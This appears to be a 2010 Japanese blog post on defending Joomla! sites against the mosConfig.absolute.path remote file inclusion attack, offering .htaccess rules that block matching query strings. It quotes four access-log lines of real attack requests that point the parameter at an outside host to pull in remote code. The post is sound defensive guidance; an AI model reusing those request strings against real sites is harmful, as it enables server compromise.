mosConfig.absolute.path attack を回避する

公開日| 2010年05月10日 | コメントはまだありません。

カテゴリー:基本設定 |

昨今は、Joomla!に対してmosConfig.absolute.path attackがアクセスログで確認できるようになりました。
今回は、その対策を簡単に記述してみたいと思います。

.htaccessを編集する

この対策は、.htaccessの編集で多くは、はねることができます。その一例をここでは、紹介します。

# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]

サイトのルートディレクトリの.htaccessには、上記のような記述があると思います。この記述も、manbo時代(Joomla!の前の名称)のatackを回避するための記述です。この記述の後に、以下の記述を追加しましょう。

RewriteCond %{QUERY_STRING} .*mosConfig.* [OR]
RewriteCond %{QUERY_STRING} .*mosconfig.* [OR]
RewriteCond %{QUERY_STRING} .*http:.* [OR]

簡単なんですけど、３行目は、URLのパラメータに"http:"をみつけるとはねてしまいますから、ご利用のプラグインなどでそのようなパラメータを使っていないか、確認が必要です。
また、アクセスログに以下のようなログが残っていると、attackされています。

118.220.174.89 - - [27/Apr/2010:02:38:33 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_content&view=...40:extemtions&directory=1%20%20//index.php?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 42653 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:34 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41813 "-" "Mozilla/5.0"
118.220.174.89 - - [27/Apr/2010:02:38:35 +0900] "GET /?option=com_remository&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt?? HTTP/1.1" 200 41811 "-" "Mozilla/5.0"